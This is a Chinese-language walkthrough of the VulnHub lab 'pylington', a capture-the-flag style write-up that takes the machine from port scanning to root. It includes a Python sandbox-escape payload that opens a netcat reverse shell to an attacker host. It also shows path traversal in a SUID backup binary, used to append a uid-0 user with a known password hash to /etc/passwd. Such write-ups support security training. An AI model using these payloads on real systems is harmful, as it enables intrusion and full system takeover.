vulnhub 之pylington

信息收集

tcp开放端口扫描

# Nmap 7.93 scan initiated Sat Sep  2 06:03:51 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:81:3C:60 (VMware)

# Nmap done at Sat Sep  2 06:04:07 2023 -- 1 IP address (1 host up) scanned in 15.16 seconds

udp开放端口扫描

# Nmap 7.93 scan initiated Sat Sep  2 06:04:07 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.43.148
Warning: 192.168.43.148 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.43.148
Host is up (0.00077s latency).
All 65535 scanned ports on 192.168.43.148 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:81:3C:60 (VMware)

# Nmap done at Sat Sep  2 06:05:33 2023 -- 1 IP address (1 host up) scanned in 86.07 seconds                                                                                         

开放端口服务扫描

# Nmap 7.93 scan initiated Sat Sep  2 06:05:33 2023 as: nmap -sT -sV -O -p22,80, -oA open_port_service 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00061s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)
MAC Address: 00:0C:29:81:3C:60 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep  2 06:05:54 2023 -- 1 IP address (1 host up) scanned in 21.07 seconds                                                                                             

getshell

通过信息收集发现靶机开放22和80端口，优先对80端口进行渗透测试。

robots.txt敏感信息发现

使用浏览器打开靶机http服务网站，发现robotx.txt路径下有三个目录

User-agent: *
Disallow: /register
Disallow: /login
Disallow: /zbir7mn240soxhicso2z 

 一一进行查看，在http://192.168.43.148/zbir7mn240soxhicso2z页面发现一个凭据，保存下来。

Username: steve

Password: bvbkukHAeVxtjjVH

 访问/login目录，使用刚刚获取到的凭据进行登录，成功登陆后显示以下画面

 点击Welcome back,steve!跳转到python代码执行页面

根据页面信息提示获取到代码执行检测语句

def check_if_safe(code: str) -> bool:
    if 'import' in code: # import is too dangerous
        return False
    elif 'os' in code: # os is too dangerous
        return False
    elif 'open' in code: # opening files is also too dangerous
        return False
    else:
        return True

 可以看到会检测代码中是否存在import,os,open字符，若有则不能执行代码，此时需要进行绕过。

根据python沙箱逃逸总结_拓海AE的博客-CSDN博客，构造出反弹shell payload语句

print(getattr(getattr(__builtins__, '__tropmi__'[::-1])('so'[::-1]), 'metsys'[::-1])('nc -e /bin/bash 192.168.43.128 443'))

 kali执行rlwrap nc -lvnp 443 进行监听，然后执行payload

 成功获取到反弹shell!

提权

在py家目录下发现suid文件typing且有源码typing.cc，

#include <iostream>
#include <string>
#include <iterator>
#include <fstream>
#include <algorithm>

int main(){
    std::cout<<"Let's play a game! If you can type the sentence below, then I'll tell you my password.\n\n";

    std::string text="the quick brown fox jumps over the lazy dog";

    
    std::cout<<text<<'\n';

    std::string line;
    std::getline(std::cin,line);

    if(line==text){
        std::ifstream password_file("/home/py/password.txt");
        std::istreambuf_iterator<char> buf_it(password_file),buf_end;
        std::ostreambuf_iterator<char> out_it (std::cout);
        std::copy(buf_it,buf_end,out_it);
    }
    else{
        std::cout<<"WRONG!!!\n";
    }
}            

查看后发现只要输入 the quick brown fox jumps over the lazy dog就会打印/home/py/password.txt文件内容。因此执行文件，输入 the quick brown fox jumps over the lazy dog，获取到密码

54ezhCGaJV

 成功切换到py用户。

 继续进行敏感信息枚举，在/home/py/secret_stuff/下发现root属主的suid文件backup和源码backup.cc文件，阅读源码

#include <iostream>
#include <string>
#include <fstream>

int main(){
    std::cout<<"Enter a line of text to back up: ";
    std::string line;
    std::getline(std::cin,line);
    std::string path;
    std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
    std::getline(std::cin,path);

    if(!path.starts_with("/srv/backups/")){
        std::cout<<"The file must be inside the /srv/backups directory!\n";
    }
    else{
        std::ofstream backup_file(path,std::ios_base::app);
        backup_file<<line<<'\n';
    }

    return 0;

}

 发现其功能是往文件中追加内容，其限制规则的逻辑是判断备份目录是否以/srv/backups开头，因此我们可以使用../绕过限制，往/etc/passwd（修改passwd,shadow,sudoers等配置文件都行）加入root用户xiaoliyu。

kali上使用openssl工具获取加密hash

openssl passwd -1 -salt xiaoliyu 1234567

$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/

靶机cat /etc/passwd|grep root，获取root行数据，将x替换为kali上生成的hash值，得到加入语句为

xiaoliyu:$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/:0:0::/root:/bin/bash

 执行backup文件，输入payload和文件名

然后切换xiaoliyu用户，密码为1234567,成功！。